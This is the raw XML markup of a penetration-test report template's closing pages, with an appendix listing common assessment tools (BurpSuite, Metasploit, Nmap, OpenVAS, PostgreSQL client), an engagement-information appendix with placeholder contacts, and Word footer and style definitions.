          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00922DBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAAF63E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="52" w:name="_Toc155811489"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDIX A - TOOLS USED</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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TOOL</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DESCRIPTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
              </w:rPr>
              <w:t>BurpSuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> Community Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A1B32C5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for testing of web applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DEFCDB2" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for exploitation of vulnerable services and vulnerability scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2156C7F7" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for scanning ports on hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A1D8D83" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used to scan the networks for vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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PostgreSQL Client Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06677445" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used to connect to the PostgreSQL server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D77C4C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Table A.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Tools used during </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
        <w:t>assessment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52C84D1E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69436C1C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc155811490"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDIX B - ENGAGEMENT INFORMATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="5A9763CF" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc155811491"/>
      <w:r>
        <w:t>Client Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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rPr>
              <w:t>Primary Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7588CA12" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;Person Name&gt;,</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>&lt;Person’s Title&gt;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t xml:space="preserve">The following people are authorized to change the scope of engagement and modify the terms of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>engagement</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="79A89A84" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;PERSON NAME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Default="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc155811492"/>
      <w:r>
        <w:t>Version Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>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p w14:paraId="608B48F6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc155811493"/>
      <w:r>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>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t>&lt;TEAM NAME&gt; Consulting</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t>555-185-1782</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86"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14:paraId="349E0B3E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;REPLACE WITH PROVIDED EMAIL&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C15B696" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="180A995F" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AA952B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502993A6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="661218E6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:sectPr w:rsidR="00475B86">
      <w:headerReference w:type="default" r:id="rId16"/>
      <w:footerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="first" r:id="rId18"/>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3898" w14:textId="77777777" w:rsidR="00423308" w:rsidRDefault="00423308">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F1FF3E7" w14:textId="77777777" w:rsidR="00423308" w:rsidRDefault="00423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542E" w14:textId="2A797AD2" w:rsidR="00475B86" w:rsidRDefault="00060D9E">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="8280"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t>AIS (Ivan Zlatanov)</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t xml:space="preserve"> CONFIDENTIAL</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="001D7723">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00922DBC">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1CEC" w14:textId="622F57C0" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Sensitive</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">: The information in this document is strictly confidential and is intended </w:t>
    </w:r>
    <w:r w:rsidR="00060D9E">
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>for Ivan Zlatanov (AIS)</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2073" w14:textId="77777777" w:rsidR="00423308" w:rsidRDefault="00423308">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00772C79" w14:textId="77777777" w:rsidR="00423308" w:rsidRDefault="00423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7B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="945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4621"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5652F4B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E747B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF6078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20046215"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BE0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602F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="240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629F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B0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71A4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A620C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A6281D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35D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0E3E19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19F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B3141B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CF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3784475">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1451894960">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1968971808">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1381706156">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="578953427">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1996491110">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1569343473">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="321398846">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2146971101">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2108383024">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="281497524">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="104078308">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1392968042">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1932810914">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1780903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012BC4"/>
    <w:rsid w:val="00060D9E"/>
    <w:rsid w:val="00061CF8"/>
    <w:rsid w:val="001D7723"/>
    <w:rsid w:val="001E41B3"/>
    <w:rsid w:val="00240AA7"/>
    <w:rsid w:val="00423308"/>
    <w:rsid w:val="00471167"/>
    <w:rsid w:val="00475B86"/>
    <w:rsid w:val="00572FAE"/>
    <w:rsid w:val="006114D1"/>
    <w:rsid w:val="00667869"/>
    <w:rsid w:val="007213CC"/>
    <w:rsid w:val="00922DBC"/>
    <w:rsid w:val="009854FE"/>
    <w:rsid w:val="00A741E5"/>
    <w:rsid w:val="00C71329"/>
    <w:rsid w:val="00E10C31"/>
    <w:rsid w:val="00EA24AF"/>
    <w:rsid w:val="00ED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 w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00ED747A"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="TimesNewRoman,Bold" w:eastAsia="Times New Roman" w:hAnsi="TimesNewRoman,Bold" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Default"/>
    <w:next w:val="Default"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:rFonts w:ascii="TimesNewRoman,Bold" w:eastAsia="Times New Roman" w:hAnsi="TimesNewRoman,Bold" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Default"/>
    <w:next w:val="Default"/>
    <w:link w:val="CommentTextChar"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:rFonts w:ascii="TimesNewRoman,Bold" w:eastAsia="Times New Roman" w:hAnsi="TimesNewRoman,Bold" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Default"/>
    <w:next w:val="Default"/>
    <w:link w:val="BodyText3Char"/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText3Char">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText3"/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED747A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED747A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED747A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED747A"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
